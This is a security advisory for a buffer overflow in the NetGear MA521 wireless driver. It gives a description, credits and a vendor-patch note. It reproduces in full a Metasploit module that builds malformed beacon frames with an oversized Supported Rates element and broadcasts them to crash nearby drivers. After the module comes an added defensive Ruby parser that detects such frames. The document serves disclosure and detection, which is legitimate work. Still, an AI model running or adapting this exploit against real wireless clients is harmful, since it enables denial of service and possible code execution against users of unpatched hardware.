NetGear MA521 Wireless Driver Long Rates Overflow Vulnerability
Published: 2006-11-18
Updated: 2006-11-20
Affected systems:
Netgear MA521
Description:
BUGTRAQ ID: 21175
The NetGear MA521 is an 802.11b wireless PC card.
The NetGear MA521 driver contains a vulnerability in its handling of malformed frames; a remote attacker could exploit it to execute arbitrary instructions on the user's machine.
If a malformed frame (beacon or probe response) is received while the interface is in active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. A remote attacker can trigger the buffer overflow by sending a frame containing an invalid supported rates information element, leading to arbitrary code execution.
<*Source: Laurent Butti (laurent.butti@orange-ftgroup.com)
H D Moore (hdm@metasploit.com)
Link: http://projects.info-pull.com/mokb/MOKB-18-11-2006.html
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
module Msf
  class Auxiliary::Dos::Wireless::Netgear_MA521_Rates < Msf::Auxiliary
    include Exploit::Lorcon

    def initialize(info = {})
      super(update_info(info,
        'Name'        => 'NetGear MA521 Wireless Driver Long Rates Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the NetGear MA521 wireless device
          driver under Windows XP. When a specific malformed frame (beacon or probe response)
          is received by the wireless interface under active scanning mode, the MA521nd5.SYS
          driver attempts to write to an attacker-controlled memory location. The vulnerability
          is triggered by an invalid supported rates information element.

          This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
          NetGear MA521 PCMCIA adapter. A remote code execution module is also in development.

          This module depends on the Lorcon library and only works on the Linux platform
          with a supported wireless card. Please see the Ruby Lorcon documentation
          (external/ruby-lorcon/README) for more information.
        },
        'Author'      => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
        'License'     => MSF_LICENSE,
        'References'  =>
          [
            ['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
            ['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
          ]
      ))

      register_options(
        [
          OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
          OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
        ], self.class)
    end

    def run
      open_wifi

      stime = Time.now.to_i
      rtime = datastore['RUNTIME'].to_i
      count = 0

      print_status("Creating malicious beacon frame...")
      frame = create_beacon()

      print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
      while (stime + rtime > Time.now.to_i)
        wifi.write(frame)
        select(nil, nil, nil, 0.10) if (count % 100 == 0)
        count += 1
      end
      print_status("Completed sending #{count} beacons.")
    end

    def create_beacon
      ssid    = Rex::Text.rand_text(6)
      bssid   = Rex::Text.rand_text(6)
      channel = datastore['CHANNEL'].to_i
      seq     = [rand(255)].pack('n')

      frame =
        "\x80" +                          # type/subtype
        "\x00" +                          # flags
        "\x00\x00" +                      # duration
        eton(datastore['ADDR_DST']) +     # dst
        bssid +                           # src
        bssid +                           # bssid
        seq +                             # seq
        Rex::Text.rand_text(8) +          # timestamp value
        "\x64\x00" +                      # beacon interval
        "\x01\x00" +                      # capabilities

        # ssid IE
        "\x00" + ssid.length.chr + ssid +

        # supported rates IE overflow
        "\x01" + "\xFF" + ("\x41" * 255) +

        # channel IE
        "\x03" + "\x01" + channel.chr

      return frame
    end
  end
end
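As an added example (not part of the advisory or of the Metasploit module above), the following Ruby parses the information elements of a beacon frame with the bounds check the vulnerable driver lacked and flags a Supported Rates IE longer than the 8 rates IEEE 802.11 permits, which is the signature of the frame that create_beacon builds. The sample frames, the placeholder MAC addresses and the SSID "test" are constructed for the example.

```ruby
# Added example (not part of the advisory or the Metasploit module): a
# bounds-checked parser for the information elements (IEs) of an 802.11
# beacon frame that flags the oversized Supported Rates IE described above.
# IEEE 802.11 allows at most 8 rates in the Supported Rates IE (ID 1); any
# further rates belong in the Extended Supported Rates IE (ID 50).

MGMT_HEADER_LEN     = 24  # frame control, duration, addr1-3, sequence control
BEACON_FIXED_LEN    = 12  # timestamp(8) + beacon interval(2) + capabilities(2)
IE_SUPPORTED_RATES  = 1
MAX_SUPPORTED_RATES = 8

# Walk the TLV list that follows the fixed beacon fields. Returns an array of
# {id:, len:, body:, truncated:} hashes. A declared length that runs past the
# end of the frame is reported as truncated rather than read out of bounds.
def parse_beacon_ies(frame)
  bytes = frame.bytes
  pos = MGMT_HEADER_LEN + BEACON_FIXED_LEN
  ies = []
  while pos + 2 <= bytes.length
    id, len = bytes[pos], bytes[pos + 1]
    body = bytes[pos + 2, len] || []
    ies << { id: id, len: len, body: body.pack('C*'), truncated: body.length < len }
    pos += 2 + len
  end
  ies
end

# Supported Rates IEs whose declared length exceeds the 8-rate maximum; a
# non-empty result is the signature of the frame built by create_beacon.
def oversized_rates_ies(frame)
  parse_beacon_ies(frame).select do |ie|
    ie[:id] == IE_SUPPORTED_RATES && ie[:len] > MAX_SUPPORTED_RATES
  end
end

# Constructed sample frames: the module's random fields are replaced by fixed
# placeholder bytes (broadcast dst, 02:02:02:02:02:02 as src and bssid).
HEADER = ("\x80\x00\x00\x00" + "\xFF" * 6 + "\x02" * 12 + "\x00\x00" +
          "\x00" * 8 + "\x64\x00" + "\x01\x00").b
BENIGN_BEACON    = HEADER + "\x00\x04test".b + "\x01\x04\x82\x84\x8b\x96".b + "\x03\x01\x06".b
# Same IE layout as create_beacon: rates IE with length 0xFF and 255 bytes of 'A'.
MALICIOUS_BEACON = HEADER + "\x00\x04test".b + "\x01\xFF".b + "A" * 255 + "\x03\x01\x06".b

puts "benign:    #{oversized_rates_ies(BENIGN_BEACON).length} oversized rates IE(s)"
puts "malicious: #{oversized_rates_ies(MALICIOUS_BEACON).length} oversized rates IE(s)"
```

A frame cut off part way through the 255-byte IE is reported as truncated instead of being read past its end, so the parser itself cannot be driven into the out-of-bounds access the advisory describes.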
Recommendation:
Vendor patch:
Netgear
-------
The vendor has not yet released a patch or upgrade. We recommend that users of this product monitor the vendor's homepage for the latest version:
http://www.netgear.com/